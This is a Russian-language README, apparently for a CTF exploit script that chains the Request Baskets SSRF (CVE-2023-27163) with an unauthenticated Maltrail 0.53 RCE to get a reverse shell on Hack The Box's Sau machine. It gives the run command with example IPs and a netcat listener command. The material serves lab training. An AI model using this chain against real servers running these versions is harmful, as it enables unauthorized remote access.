
Автоматизированная цепочка эксплойтов для HTB Sau — CVE-2023-27163 (SSRF) + Maltrail неаутентифицированный RCE → Reverse Shell
Python-скрипт эксплойта, который объединяет CVE-2023-27163 (Server-Side Request Forgery в Request Baskets ≤ 1.2.1) с неаутентифицированной уязвимостью удалённого выполнения кода в Maltrail 0.53, доставляя reverse shell. Разработан для машины Sau на Hack The Box.
Этот скрипт автоматизирует путь эксплуатации, необходимый для получения начального доступа к цели:
python3 exploit.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>
Пример:
python3 exploit.py http://10.10.11.224 10.10.14.6 4444
Перед запуском эксплойта запустите listener на своей машине, чтобы поймать reverse shell:
nc -lvnp <LISTENER_PORT>
Пример:
nc -lvnp 4444
| Параметр | Описание |
|---|---|
TARGET_URL | Базовый URL цели (например, http://IP) |
LISTENER_IP | IP вашей атакующей машины |
LISTENER_PORT | Порт для приёма reverse shell |
bucket_url)/ из URL цели (обрабатывается автоматически в скрипте)Этот проект предназначен для образовательных целей и использования в авторизованных средах, таких как Hack The Box. Не используйте его против систем без соответствующего разрешения.